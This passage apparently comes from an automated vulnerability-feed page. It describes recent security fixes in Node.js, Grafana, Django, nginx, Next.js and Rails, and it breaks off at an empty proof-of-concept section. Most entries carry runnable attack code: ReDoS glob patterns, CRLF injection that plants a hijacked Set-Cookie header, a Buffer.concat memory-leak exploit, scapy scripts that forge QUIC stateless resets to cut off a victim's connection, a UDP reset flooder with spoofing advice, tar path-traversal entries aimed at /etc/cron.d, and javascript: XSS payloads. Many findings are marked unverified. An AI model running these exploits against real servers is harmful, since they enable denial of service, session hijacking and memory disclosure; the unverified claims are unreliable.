  // Synchronously emit 'close' to trigger freeParser() while llhttp_execute() is still on the stack
  req.socket.emit('close');
  res.end();
});
server.listen(0, () => {
  const client = connect(server.address().port);
  // Send two pipelined requests in one write - processed by a single llhttp_execute() call
  // When 'close' fires during first request, parser is freed while second request is still being parsed
  client.end(
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\n\r\n' +
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
  );
});
// Result before patch: process crashes with SIGSEGV or assertion failure due to null pointer dereference

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 3, 2026, 11:14 PM — nodejs/node

Commit: 330e3ee

Author: dependabot\[bot\]

The minimatch library versions before 3.1.5 contained a ReDoS vulnerability where specially crafted glob patterns could cause catastrophic backtracking in regular expression matching, leading to excessive CPU consumption and denial of service. The fix in 3.1.5 includes limiting recursion in pattern matching to prevent exponential backtracking. However, this affects only developer tooling (clang-format), not the Node.js runtime itself, limiting real-world impact.


Affected Code

"version": "3.1.3",
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.3.tgz",
"integrity": "sha512-M2GCs7Vk83NxkUyQV1bkABc4yxgz9kILhHImZiBPAZ9ybuvCb0/H7lEl5XvIg3g+9d4eNotkZA5IWwYl0tibaA=="

Proof of Concept

const minimatch = require('minimatch');
// This pattern causes catastrophic backtracking in minimatch < 3.1.5
const maliciousPattern = '{' + 'a,'.repeat(100) + 'a}';
console.time('match');
minimatch('aaaaaaaaaaaaaaaaaaaaaaaaa', maliciousPattern);
console.timeEnd('match'); // Takes extremely long time, blocking event loop

🔥 HIGH UNVERIFIED Path Traversal / Arbitrary File Overwrite

Mar 3, 2026, 02:57 PM — grafana/grafana

Commit: 44fe577

Author: Jack Westbrook

The `tar` npm package at major version 6 and earlier is affected by known vulnerabilities (including CVE-2024-28863), among them path traversal flaws where specially crafted tar archives can write files outside the intended extraction directory. By bumping `tar` from 6.x to 7.x, this patch removes the vulnerable version and its dependency chain (including the old `cacache@^15.2.0`, which depended on `tar@^6.0.2`). The path traversal class allows an attacker to craft a malicious tarball that, when extracted, overwrites arbitrary files on the filesystem.

🔍 View Affected Code & PoC

Affected Code

"cacache@npm:^15.2.0":
  tar: "npm:^6.0.2"
  ...
(tar 6.x is vulnerable to path traversal via crafted archive entries)

Proof of Concept

Using tar 6.x: create a malicious tarball with an entry path like '../../../../etc/cron.d/malicious' that traverses outside the extraction directory. When extracted via tar.extract({cwd: '/safe/dir'}), the file is written to /etc/cron.d/malicious instead. Example: `const tar = require('tar'); tar.x({file: 'malicious.tar', cwd: '/tmp/safe'})` where malicious.tar contains an entry with path '../../../tmp/pwned' using a crafted header with absolute or traversal path sequences.
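The traversal mechanics generalize beyond node-tar. The following Python sketch (using the stdlib tarfile module; the paths and the `is_within` helper are illustrative) builds an archive whose entry escapes the extraction directory, and shows the containment check a safe extractor must perform:

```python
import io, os, tarfile

# Build an in-memory tar whose single entry tries to escape the extraction dir.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tf:
    info = tarfile.TarInfo(name="../../tmp/pwned")
    data = b"owned"
    info.size = len(data)
    tf.addfile(info, io.BytesIO(data))
buf.seek(0)

def is_within(base, name):
    # A safe extractor resolves each member path against the target directory
    # and rejects anything that lands outside it.
    base = os.path.abspath(base)
    target = os.path.abspath(os.path.join(base, name))
    return os.path.commonpath([base, target]) == base

with tarfile.open(fileobj=buf, mode="r") as tf:
    for member in tf.getmembers():
        verdict = "safe" if is_within("/safe/dir", member.name) else "TRAVERSAL"
        print(member.name, "->", verdict)  # ../../tmp/pwned -> TRAVERSAL
```

tar 7.x performs an equivalent containment check during extraction; pre-7.x behavior is what the spoiler above describes.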

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS)

Jan 30, 2026, 01:52 AM — django/django

Commit: 951ffb3

Author: Natalia

Django's URLField.to_python() used urlsplit() to detect URL schemes, which on Windows performs NFKC Unicode normalization. This normalization is disproportionately slow for inputs containing certain Unicode characters (e.g., characters like '¾'), allowing an attacker to craft a POST payload that causes excessive CPU consumption. The patch replaces urlsplit() with str.partition(':') for scheme detection, avoiding Unicode normalization entirely.

🔍 View Affected Code & PoC

Affected Code

try:
    return list(urlsplit(url))
except ValueError:
    # urlsplit can raise a ValueError with some
    # misformatted URLs.
    raise ValidationError(self.error_messages["invalid"], code="invalid")

Proof of Concept

On Windows, send a POST request with a URLField value containing a large string of Unicode characters that trigger slow NFKC normalization:

import requests
# Craft a payload with characters that cause slow NFKC normalization
payload = {'url_field': 'http://' + '\u00be' * 50000}  # '¾' repeated 50000 times
requests.post('http://target-django-app/form/', data=payload)
# This causes urlsplit() to perform slow Unicode normalization on Windows,
# consuming excessive CPU and potentially blocking the server's worker threads.
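The patched approach is easy to sketch: `str.partition(':')` looks only at the first colon and never normalizes the input. This is a simplified illustration of the Django change, not its exact code; `scheme_of` is a made-up helper name:

```python
def scheme_of(url):
    # str.partition splits on the first ':' without any Unicode
    # normalization, unlike urlsplit() on Windows.
    scheme, sep, _ = url.partition(":")
    return scheme.lower() if sep else ""

print(scheme_of("http://example.com"))            # http
print(scheme_of("no-scheme-here"))                # (empty string)
print(scheme_of("HTTPS://x" + "\u00be" * 1000))   # https
```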

💡 LOW UNVERIFIED Incorrect Permissions / Race Condition (umask)

Jan 21, 2026, 09:03 PM — django/django

Commit: 019e44f

Author: Natalia

In multi-threaded Django applications, the file-based cache backend and filesystem storage used temporary umask changes (via os.umask()) to control directory permissions when creating directories. Because os.umask() is a process-wide operation, a temporary umask change in one thread could affect directory/file creation in other threads, resulting in file system objects being created with unintended (potentially overly permissive) permissions. The patch replaces the umask manipulation approach with a safe_makedirs() function that uses os.chmod() after os.mkdir() to enforce the exact requested permissions.

🔍 View Affected Code & PoC

Affected Code

old_umask = os.umask(0o077)
try:
    os.makedirs(self._dir, 0o700, exist_ok=True)
finally:
    os.umask(old_umask)

Proof of Concept

import threading, os, tempfile, time
# In a multi-threaded Django app using FileBasedCache:
# Thread A calls _createdir() which sets umask to 0o077
# Thread B simultaneously creates a file/directory expecting default umask (e.g., 0o022)
# Thread B's file ends up with permissions masked by Thread A's 0o077 umask
# Concrete example:
tmp = tempfile.mkdtemp()
def thread_a():
    # Simulates FileBasedCache._createdir() - sets umask to 0o077
    os.umask(0o077)
    time.sleep(0.01)  # holds umask while thread B runs
    os.umask(0o022)  # restore

def thread_b():
    time.sleep(0.005)  # starts after thread A changes umask
    path = os.path.join(tmp, 'upload_dir')
    os.makedirs(path, 0o755, exist_ok=True)  # intended: rwxr-xr-x
    print(oct(os.stat(path).st_mode & 0o777))  # actual: 0o700 (too restrictive) due to umask 0o077

ta = threading.Thread(target=thread_a)
tb = threading.Thread(target=thread_b)
ta.start(); tb.start(); ta.join(); tb.join()
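A sketch of the patched direction, assuming the goal is "exact mode regardless of process umask" (the name `safe_makedirs` mirrors the patch, but the details here are illustrative, not Django's code):

```python
import os, tempfile

def safe_makedirs(path, mode):
    # Create the directory, then force the exact mode with chmod, so the
    # result does not depend on whatever umask another thread set meanwhile.
    os.makedirs(path, exist_ok=True)
    os.chmod(path, mode)

old = os.umask(0o077)   # simulate a hostile/temporary umask from another thread
try:
    d = os.path.join(tempfile.mkdtemp(), "cache")
    safe_makedirs(d, 0o755)
    print(oct(os.stat(d).st_mode & 0o777))  # 0o755 despite the 0o077 umask
finally:
    os.umask(old)
```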

🔥 HIGH UNVERIFIED HTTP Header Injection (CRLF Injection)

Mar 2, 2026, 07:10 PM — nodejs/node

Commit: acb79bc

Author: Matteo Collina

The `path` property on `ClientRequest` was only validated against `INVALID_PATH_REGEX` at construction time. After construction, an attacker (or vulnerable application code) could reassign `req.path` to include CRLF sequences (`\r\n`), which would then be flushed verbatim to the socket in `_implicitHeader()`, allowing injection of arbitrary HTTP headers or request smuggling. The patch adds a getter/setter using a symbol-backed property so validation runs on every assignment.

🔍 View Affected Code & PoC

Affected Code

this.path = options.path || '/';

Proof of Concept

const http = require('http');
const req = new http.ClientRequest({ host: 'example.com', port: 80, path: '/safe', method: 'GET', createConnection: () => {} });
// After construction, mutate path with CRLF injection
req.path = '/safe\r\nX-Injected: malicious\r\nFoo: bar';
// When _implicitHeader() fires, it sends: GET /safe\r\nX-Injected: malicious\r\nFoo: bar HTTP/1.1
// This injects arbitrary headers into the outgoing HTTP request
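The validate-on-every-assignment fix can be sketched in Python with a property, as an analogue of Node's symbol-backed getter/setter (`Request` and `INVALID_PATH` are illustrative names, not Node internals):

```python
import re

# Rough analogue of Node's INVALID_PATH_REGEX: reject anything outside the
# printable 0x21-0xff range (which excludes CR, LF, and other controls).
INVALID_PATH = re.compile(r"[^\u0021-\u00ff]")

class Request:
    def __init__(self, path="/"):
        self.path = path   # routed through the setter, so it is validated too

    @property
    def path(self):
        return self._path

    @path.setter
    def path(self, value):
        if INVALID_PATH.search(value):
            raise ValueError("invalid characters in request path")
        self._path = value

r = Request("/safe")
try:
    r.path = "/safe\r\nX-Injected: 1"   # CR/LF now rejected on reassignment
except ValueError as e:
    print("rejected:", e)
```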

🔥 HIGH UNVERIFIED CRLF Injection

Mar 2, 2026, 12:49 PM — nodejs/node

Commit: e78bf55

Author: Richard Clarke

The `writeEarlyHints()` function in Node.js HTTP server directly concatenated user-supplied header names and values into the raw HTTP/1.1 response without any validation. Unlike `setHeader()` and `writeHead()`, no calls to `validateHeaderName()`, `validateHeaderValue()`, or `checkInvalidHeaderChar()` were made, allowing CRLF sequences to pass through unchecked and inject arbitrary HTTP headers or entire responses. The patch adds proper validation for header names, values, and Link header URLs.

🔍 View Affected Code & PoC

Affected Code

const keys = ObjectKeys(hints);
for (let i = 0; i < keys.length; i++) {
  const key = keys[i];
  if (key !== 'link') {
    head += key + ': ' + hints[key] + '\r\n';
  }
}

Proof of Concept

const http = require('http');
const server = http.createServer((req, res) => {
  // Inject a fake Set-Cookie header via CRLF in a non-link header value
  res.writeEarlyHints({
    'link': '</style.css>; rel=preload; as=style',
    'X-Custom': 'value\r\nSet-Cookie: session=hijacked; Path=/'
  });
  res.end('hello');
});
// The raw HTTP response will contain an injected 'Set-Cookie: session=hijacked' header
// because 'value\r\nSet-Cookie: session=hijacked; Path=/' is concatenated directly into the response.
// Similarly, injecting via header name: { 'X-Foo\r\nSet-Cookie: evil=1': 'v' }

⚠️ MEDIUM UNVERIFIED Header Injection / Information Disclosure

Mar 2, 2026, 12:49 AM — nodejs/node

Commit: a6e9e32

Author: Node.js GitHub Bot

The cache interceptor was spreading `result.vary` headers directly into revalidation requests without filtering out `null` values. When a request header specified in the `Vary` header was absent from the original request, it was stored as `null` in the cache entry's `vary` map. Spreading this `null` value into the revalidation headers could corrupt the header object and potentially send unintended null-valued headers to the server. The patch adds a null-check guard so only present header values are forwarded during revalidation.

🔍 View Affected Code & PoC

Affected Code

if (result.vary) {
  headers = {
    ...headers,
    ...result.vary
  }
}

Proof of Concept

// Server responds with Vary: accept-encoding
// Original request does NOT include accept-encoding header
// Cache stores vary = { 'accept-encoding': null }
// On revalidation, the spread { ...headers, ...result.vary } produces:
// { 'if-modified-since': '...', 'accept-encoding': null }
// Sending a request with a null-valued header could bypass server-side Vary matching
// or cause unexpected behavior in downstream servers/proxies that interpret null differently.
// Trigger: make a cached request without 'accept-encoding', wait for stale-while-revalidate,
// observe the revalidation request incorrectly includes 'accept-encoding: null'
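The guard amounts to dropping absent (null) vary values before merging headers. A Python sketch of the same filtering (`revalidation_headers` is a hypothetical helper, not undici's code):

```python
def revalidation_headers(headers, vary):
    # Forward only vary entries that were actually present on the original
    # request; absent ones are stored as None and must not be sent.
    merged = dict(headers)
    merged.update({k: v for k, v in (vary or {}).items() if v is not None})
    return merged

h = revalidation_headers(
    {"if-modified-since": "t"},
    {"accept-encoding": None, "accept": "text/html"},
)
print(h)  # {'if-modified-since': 't', 'accept': 'text/html'}
```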

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 1, 2026, 02:27 PM — nodejs/node

Commit: 4d0cb65

Author: Node.js GitHub Bot

This update to minimatch 10.2.4 adds mitigations for ReDoS vulnerabilities by introducing `maxGlobstarRecursion` and `maxExtglobRecursion` limits to prevent catastrophic backtracking when processing untrusted glob patterns. The README explicitly acknowledges that user-controlled glob patterns can be weaponized for DoS attacks. The patch adds depth tracking and recursion limits for extglob and globstar patterns to cap the complexity of the generated regular expressions.

🔍 View Affected Code & PoC

Affected Code

// No recursion depth limits on extglob nesting or globstar patterns
// Untrusted input could generate catastrophically backtracking RegExp
const assertValidPattern: (pattern: any) => void = (
  pattern: any,
): asserts pattern is string => {

Proof of Concept

const { minimatch } = require('minimatch');
// Before the patch, deeply nested extglob patterns from untrusted input
// could cause catastrophic backtracking:
const evilPattern = '*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a|*(a))))))))))';
const evilInput = 'a'.repeat(30);
// This would hang/crash Node.js process due to ReDoS
minimatch(evilInput, evilPattern);

🔥 HIGH UNVERIFIED Information Disclosure (Uninitialized Memory Exposure)

Feb 27, 2026, 06:36 PM — nodejs/node

Commit: cc6c188

Author: Mert Can Altin

Before the patch, Buffer.concat() computed the total allocation size using the user-controllable `.length` property of each element, then allocated with `Buffer.allocUnsafe(length)`. For typed arrays, an attacker could spoof a larger `.length` via a getter, causing an oversized uninitialized Buffer to be returned, leaking process memory contents. The patch fixes this by using the typed array’s intrinsic byte length (`TypedArrayPrototypeGetByteLength`) and by allocating via `allocate` plus explicit zero-filling of any slack.

🔍 View Affected Code & PoC

Affected Code

for (let i = 0; i < list.length; i++) {
  if (list[i].length) {
    length += list[i].length;
  }
}
const buffer = Buffer.allocUnsafe(length);

Proof of Concept

/* Run on a Node version before cc6c18802dc6dfc041f359bb417187a7466e9e8f */

// Attacker-controlled Uint8Array with spoofed .length getter inflates allocation size.
const u8_1 = new Uint8Array([1, 2, 3, 4]);
const u8_2 = new Uint8Array([5, 6, 7, 8]);
Object.defineProperty(u8_1, 'length', { get() { return 1024 * 1024; } }); // 1MB

const b = Buffer.concat([u8_1, u8_2]);
console.log('returned length:', b.length); // BEFORE PATCH: 1048576 + 8 (or similar huge value)

// Only first 8 bytes are controlled; the rest is uninitialized heap data.
// Demonstrate leak by showing non-zero/unexpected bytes in the tail.
let leaked = 0;
for (let i = 8; i < b.length; i++) {
  if (b[i] !== 0) { leaked++; if (leaked > 32) break; }
}
console.log('non-zero bytes after concatenated data (leak indicator):', leaked);

// Print a slice of leaked memory.
console.log('tail sample:', b.subarray(8, 8 + 64));

🔥 HIGH UNVERIFIED Improper Authentication / Cryptographic Token Misbinding (QUIC Stateless Reset token exposure leading to DoS)

Feb 26, 2026, 02:36 PM — nginx/nginx

Commit: f72c745

Author: Roman Arutyunyan

Before the patch, the QUIC stateless reset token was derived only from a shared secret and the connection ID, making the token identical across workers. In a multi-worker configuration with packet steering, an attacker could intentionally route a victim connection's packet to a different worker to trigger emission/observation of the stateless reset token, then forge a QUIC Stateless Reset to immediately terminate the victim connection (remote DoS). The patch binds the derived token to the worker number by incorporating ngx_worker into the KDF input, making tokens differ per worker and preventing cross-worker token acquisition/abuse.

🔍 View Affected Code & PoC

Affected Code

tmp.data = secret;
tmp.len = NGX_QUIC_SR_KEY_LEN;

if (ngx_quic_derive_key(c->log, "sr_token_key", &tmp, cid, token,
                        NGX_QUIC_SR_TOKEN_LEN) != NGX_OK) {

Proof of Concept

Prereqs: nginx built with QUIC, configured with multiple workers (e.g., worker_processes 4;), and client behind NAT or attacker can spoof/own a 5-tuple to influence RSS/ECMP so packets land on different workers.

1) Establish a QUIC connection from victim client (or attacker-controlled client) to nginx and note the server-chosen DCID used in 1-RTT packets.

2) Force a packet for that existing connection to be processed by the "wrong" worker (e.g., by changing UDP source port so Linux RSS hashes to another receive queue/worker while keeping the same QUIC DCID):
   # pseudo: send a 1-RTT packet with same DCID but altered UDP 5-tuple
   python3 - <<'PY'
from scapy.all import *
# Requires QUIC packet crafting; below is schematic.
SERVER_IP='1.2.3.4'
SERVER_PORT=443
SRC_IP='victim-or-attacker-ip'
NEW_SPORT=40000  # choose to steer to different worker via RSS hash
DCID=bytes.fromhex('00112233445566778899aabbccddeeff')  # observed DCID
# payload must be a syntactically valid short-header 1-RTT QUIC packet for that DCID
quic_pkt = b'\x40' + DCID + b'\x00'*32
send(IP(src=SRC_IP,dst=SERVER_IP)/UDP(sport=NEW_SPORT,dport=SERVER_PORT)/Raw(load=quic_pkt), verbose=False)
PY

3) Observe that nginx responds with a QUIC Stateless Reset on that 5-tuple. Capture it with tcpdump:
   sudo tcpdump -ni any udp port 443 -vv -X
   The Stateless Reset contains a 16-byte token at the end of the UDP payload.

4) Use the captured token to kill the real connection: send a forged Stateless Reset to the victim's original 5-tuple (or to the peer that will accept it), with the token at the end:
   python3 - <<'PY'
from scapy.all import *
SERVER_IP='1.2.3.4'
VICTIM_IP='victim-ip'
SPORT=443
DPORT=54321  # victim's UDP port used for the QUIC connection
TOKEN=bytes.fromhex('deadbeef'*4)  # replace with captured 16-byte token
# QUIC Stateless Reset is an unpredictable-looking packet >= 21 bytes, token must be last 16 bytes
payload = b'\x00'*32 + TOKEN
send(IP(src=SERVER_IP,dst=VICTIM_IP)/UDP(sport=SPORT,dport=DPORT)/Raw(load=payload), verbose=False)
PY

Expected result (pre-patch): the victim QUIC stack accepts the Stateless Reset and immediately closes the connection (DoS). Post-patch: token differs per worker, so a token obtained via wrong-worker routing will not validate for the victim's actual worker-path, and the forged reset is ignored.
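The per-worker binding can be sketched with an HMAC-based derivation that mixes the worker number into the KDF input (illustrative only; nginx's actual KDF and label handling differ):

```python
import hmac, hashlib

def sr_token(secret: bytes, cid: bytes, worker: int) -> bytes:
    # Bind the stateless reset token to both the connection ID and the
    # worker number, so a token observed via one worker does not validate
    # for a connection handled by another worker.
    msg = b"sr_token_key" + cid + worker.to_bytes(4, "big")
    return hmac.new(secret, msg, hashlib.sha256).digest()[:16]

secret = b"\x00" * 32
cid = bytes.fromhex("00112233445566778899aabbccddeeff")
t0 = sr_token(secret, cid, 0)
t1 = sr_token(secret, cid, 1)
print(t0 != t1)  # True: same CID, different worker => different token
```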

🔥 HIGH UNVERIFIED NULL Pointer Dereference (Remote Denial of Service)

Feb 24, 2026, 01:33 AM — nginx/nginx

Commit: c67bf94

Author: user.email

Before the patch, the QUIC OpenSSL compatibility keylog callback discarded failures from ngx_quic_compat_set_encryption_secret(). Under memory pressure (allocation failure), the encryption context (secret->ctx) could remain NULL, yet ngx_quic_compat_create_record() would proceed to encrypt and dereference the NULL ctx, crashing the NGINX worker. The patch checks the return value, marks the QUIC connection as errored to fail the handshake cleanly, and adds a NULL guard in record creation to prevent the crash.

🔍 View Affected Code & PoC

Affected Code

(void) ngx_quic_compat_set_encryption_secret(c, &com->keys, level,
                                             cipher, secret, n);
...
secret = &rec->keys->secret;
ngx_memcpy(nonce, secret->iv.data, secret->iv.len);
/* later: encrypt using secret->ctx (could be NULL) */

Proof of Concept

# PoC: remote crash via QUIC handshake while forcing allocation failure (OOM)
# This demonstrates an exploitable, remotely triggerable DoS when QUIC is enabled
# and the worker runs out of memory during the TLS keylog callback.

# 1) Run nginx with QUIC enabled (HTTP/3) in a memory-cgroup limited container.
# Example docker run limiting memory so malloc failures occur during handshake:
#   docker run --rm -it --memory=64m --pids-limit=256 -p 443:443/udp nginx:quic
# (Use an nginx build/config that enables QUIC and listens on 443 quic.)

# 2) From another host, flood with QUIC handshakes to increase memory pressure:
# Using ngtcp2's client to rapidly initiate TLS/QUIC handshakes:
for i in $(seq 1 2000); do
  ngtcp2-client --exit-on-all-streams-close --timeout=1 127.0.0.1 443 >/dev/null 2>&1 &
done
wait

# Expected behavior BEFORE patch:
# - Under memory pressure, ngx_quic_compat_set_encryption_secret() can fail,
#   leaving secret->ctx NULL.
# - A subsequent CRYPTO record creation attempts to encrypt using NULL ctx,
#   leading to SIGSEGV and worker process crash (remote DoS).
#   (In logs/dmesg you'll see a segfault in the worker.)

# Expected behavior AFTER patch:
# - Handshake fails with internal error; worker does not crash.

🔥 HIGH UNVERIFIED Sensitive Data Exposure (Secrets persisted to cache)

Feb 26, 2026, 02:11 PM — vercel/next.js

Commit: 2307bf6

Author: Tobias Koppers

Before the patch, `ProcessEnv::read_all()` returned a serializable `EnvMap`, which could be automatically persisted into Turbopack/Next.js' on-disk persistent cache. This meant any process environment variable (including secrets like API keys and tokens) could be written to disk and later recovered by anyone with read access to the cache directory (e.g., another local user, CI artifact consumers, or a compromised build agent). The patch introduces `TransientEnvMap` with `serialization = "none"` and changes `read_all()` to return it, preventing env vars from being persisted and forcing them to be re-read from the process environment after cache restore.

🔍 View Affected Code & PoC

Affected Code

/// Reads all env variables into a Map
#[turbo_tasks::function]
fn read_all(self: Vc<Self>) -> Vc<EnvMap>;

// e.g.
Vc::cell(env_snapshot())

Proof of Concept

Prereq: a Next.js/Turbopack project using persistent caching (default local cache dir).

1) Run a build with a secret in the environment so it gets captured by `read_all()`:

   $ export AWS_SECRET_ACCESS_KEY='POC_SUPER_SECRET_123'
   $ export NEXT_TELEMETRY_DISABLED=1
   $ next dev   # or a turbopack-enabled build that populates the persistent cache

2) Search the on-disk cache for the secret (the exact path can vary by platform, but typically under the project’s .next cache or Turbopack cache directory):

   $ rg -n "POC_SUPER_SECRET_123" .next/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" .turbo/ 2>/dev/null || true
   $ rg -n "POC_SUPER_SECRET_123" . 2>/dev/null | head

Expected vulnerable behavior (before patch): the secret string is found in one or more cache files because `EnvMap` was auto-serialized.

Impact demonstration: any actor who can read that cache directory (e.g., another user on the machine, or someone who downloads CI cache artifacts) can recover `AWS_SECRET_ACCESS_KEY` by grepping the cache.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS) / Amplification via Stateless Reset flooding

Feb 25, 2026, 05:09 PM — nginx/nginx

Commit: e6ffe83

Author: Sergey Kandaurov

Before the patch, nginx would generate and send a QUIC Stateless Reset for every incoming packet that triggered the stateless reset path, with no per-source rate limiting. An attacker could spoof many UDP packets (often with spoofed source IPs) to force the server to spend CPU on hashing/random generation and to emit many Stateless Reset packets, creating resource exhaustion and reflected traffic. The patch adds a per-second Bloom-filter-based limiter keyed by source address so repeated triggers from the same address are declined.

🔍 View Affected Code & PoC

Affected Code

ngx_int_t
ngx_quic_send_stateless_reset(ngx_connection_t *c, ngx_quic_conf_t *conf,
    ngx_quic_header_t *pkt)
{
    ...
    if (pkt->len <= NGX_QUIC_MIN_SR_PACKET) {
        len = pkt->len - 1;
    ...
    return ngx_quic_send(c, buf, len, c->sockaddr, c->socklen);
}

Proof of Concept

Prereq: QUIC enabled on nginx (listen ... quic).

1) Flood the server with UDP datagrams that look like short-header QUIC packets with a random DCID, causing nginx to respond with Stateless Reset repeatedly.

Example Python flooder (sends many packets; if you can spoof, set a victim IP as source to demonstrate reflection):

```python
import os, socket, time

target_ip = "NGINX_IP"
target_port = 443  # QUIC port

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# QUIC short header first byte: 0b010xxxxx (0x40..0x7f). Use 0x40.
# Fill rest with random bytes to simulate unknown connection id etc.
pkt_len = 1200
payload = bytes([0x40]) + os.urandom(pkt_len - 1)

end = time.time() + 10
while time.time() < end:
    s.sendto(payload, (target_ip, target_port))
```

Expected behavior BEFORE patch: server emits a Stateless Reset for essentially every received datagram (observable with tcpdump on server: `udp and port 443` showing many outgoing packets) and CPU/network usage increases proportionally to attack rate.

Expected behavior AFTER patch: for a given source address, after the first reset in a 1-second window, subsequent reset attempts are mostly dropped (function returns NGX_DECLINED), significantly reducing outgoing packets and server work per attacker address.

If spoofing is available (raw sockets), repeat with varying spoofed source IPs to demonstrate reflection potential; without spoofing, the same script still demonstrates server-side CPU/network DoS from a single host.
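The limiter's behavior can be approximated with a per-second seen-set keyed by source address. nginx uses a Bloom filter to bound memory; this sketch trades that for a plain set, and the `now` parameter exists only to make the example deterministic:

```python
import time

class ResetLimiter:
    """Allow at most one stateless reset per source address per second."""
    def __init__(self):
        self.window = int(time.monotonic())
        self.seen = set()

    def allow(self, addr, now=None):
        now = int(time.monotonic()) if now is None else now
        if now != self.window:          # new 1-second window: forget everything
            self.window, self.seen = now, set()
        if addr in self.seen:
            return False                # analogous to returning NGX_DECLINED
        self.seen.add(addr)
        return True

lim = ResetLimiter()
print(lim.allow("198.51.100.7", now=0))  # True  (first reset this second)
print(lim.allow("198.51.100.7", now=0))  # False (rate-limited)
print(lim.allow("203.0.113.9", now=0))   # True  (different source address)
print(lim.allow("198.51.100.7", now=1))  # True  (next one-second window)
```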

⚠️ MEDIUM CONFIRMED Cross-Site Scripting (XSS)

Feb 24, 2026, 08:56 PM — rails/rails

Commit: e905b2e

Author: Mike Dalessio

The markdown conversion functionality was vulnerable to XSS attacks through malicious javascript: URLs that could bypass protocol filtering using obfuscation techniques like leading whitespace, HTML entity encoding, or case variations. The patch fixes this by delegating URI validation to Rails::HTML::Sanitizer.allowed_uri? which properly handles these bypass attempts.

🔍 View Affected Code & PoC

Affected Code

if (href = node["href"]) && allowed_href_protocol?(href)
  "[#{inner}](#{href})"
else
  inner
end

Proof of Concept

<a href=" javascript:alert('XSS')">Click me</a> or <a href="&#106;avascript:alert('XSS')">Click me</a> - these would be converted to markdown links that execute JavaScript when clicked, bypassing the original protocol validation
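These bypasses work because naive prefix checks run before entity decoding and whitespace stripping; a robust check normalizes first. A simplified Python sketch of what such an `allowed_uri?`-style check must do (not Rails' actual implementation; `SAFE_SCHEMES` is illustrative):

```python
import html

SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" = scheme-less/relative URL

def allowed_uri(href):
    # Decode HTML entities and strip whitespace/control characters *before*
    # inspecting the scheme, so ' javascript:' and '&#106;avascript:' are
    # seen for what they are.
    decoded = html.unescape(href)
    decoded = "".join(c for c in decoded if c.isprintable() and not c.isspace())
    scheme = decoded.partition(":")[0].lower() if ":" in decoded else ""
    return scheme in SAFE_SCHEMES

print(allowed_uri("https://example.com"))            # True
print(allowed_uri(" javascript:alert('XSS')"))       # False
print(allowed_uri("&#106;avascript:alert('XSS')"))   # False
```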

🔥 HIGH UNVERIFIED Authentication Bypass

Feb 24, 2026, 08:05 PM — grafana/grafana

Commit: f1b77b8

Author: colin-stuart

The code allowed SAML authentication to create duplicate user_auth records for SCIM-provisioned users instead of updating existing ones. An attacker could exploit this by logging in via SAML with a SCIM user's credentials to create a new auth record with their own AuthID, potentially bypassing access controls or creating authentication confusion.

🔍 View Affected Code & PoC

Affected Code

if identity.AuthenticatedBy == login.GenericOAuthModule {
    query := &login.GetAuthInfoQuery{AuthModule: identity.AuthenticatedBy, UserId: usr.ID}
    userAuth, err = s.authInfoService.GetAuthInfo(ctx, query)

Proof of Concept

1. SCIM provisions user with email '[email protected]' and creates user_auth record with empty AuthID
2. Attacker performs SAML login with same email '[email protected]' but different AuthID 'attacker-saml-id' 
3. Code fails to find existing auth record by AuthID lookup, creates new user_auth record instead of updating existing one
4. Result: User now has two authentication methods - original SCIM provision + attacker's SAML AuthID, allowing potential unauthorized access

🔥 HIGH CONFIRMED Null Pointer Dereference

Feb 24, 2026, 07:51 PM — nodejs/node

Commit: 84d1e6c

Author: Nora Dossche

The code failed to check if BIO_meth_new() returns NULL before passing the result to BIO_meth_set_* functions, causing a null pointer dereference. This could lead to application crashes and potential denial of service when SSL/TLS operations are initiated under memory pressure conditions.

🔍 View Affected Code & PoC

Affected Code

BIO_METHOD* method = BIO_meth_new(BIO_TYPE_MEM, "node.js SSL buffer");
BIO_meth_set_write(method, Write);

Proof of Concept

Trigger memory exhaustion by creating many large objects, then initiate SSL/TLS connection which calls NodeBIO::GetMethod(). When BIO_meth_new() fails and returns NULL due to memory pressure, the subsequent BIO_meth_set_write(NULL, Write) call will dereference NULL pointer causing segmentation fault and application crash.

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Feb 24, 2026, 06:11 PM — nodejs/node

Commit: ec33dd9

Author: Node.js GitHub Bot

The minimatch library had a vulnerability where multiple consecutive asterisks (*) in glob patterns could cause exponential backtracking in the generated regular expression, leading to CPU exhaustion. The patch fixes this by coalescing multiple stars into a single star pattern, preventing the ReDoS condition.

🔍 View Affected Code & PoC

Affected Code

if (c === '*') {
  re += noEmpty && glob === '*' ? starNoEmpty : star;
  hasMagic = true;
  continue;
}

Proof of Concept

const { minimatch } = require('minimatch');
// This would cause exponential backtracking and hang the process
minimatch('a'.repeat(50), '*'.repeat(50) + 'x');
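The coalescing fix can be sketched as a pre-pass that collapses runs of `*` before regex translation: `a***b` matches exactly the same strings as `a*b`, but without stacked quantifiers in the compiled pattern. Illustrative only; minimatch's actual change lives inside its parser:

```python
import re

def coalesce_stars(pattern):
    # Collapse any run of two or more '*' into a single '*'; the matched
    # language is unchanged, but the generated regex cannot stack
    # overlapping quantifiers that cause exponential backtracking.
    return re.sub(r"\*{2,}", "*", pattern)

print(coalesce_stars("*" * 50 + "x"))  # *x
print(coalesce_stars("a**/b***c"))     # a*/b*c
```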

⚠️ MEDIUM UNVERIFIED Man-in-the-Middle Attack / Insufficient Certificate Validation

Feb 24, 2026, 09:32 AM — grafana/grafana

Commit: f13db65

Author: Maksym Revutskyi

The code before the patch used HTTP transport without proper TLS certificate validation when communicating with external image renderer services. This allowed attackers to intercept HTTPS communications through man-in-the-middle attacks, potentially exposing authentication tokens and sensitive data. The patch adds support for custom CA certificates to enable proper certificate validation.

🔍 View Affected Code & PoC

Affected Code

var netTransport = &http.Transport{
	Proxy: http.ProxyFromEnvironment,
	Dial: (&net.Dialer{
		Timeout: 30 * time.Second,
	}).Dial,
	TLSHandshakeTimeout: 5 * time.Second,
}

Proof of Concept

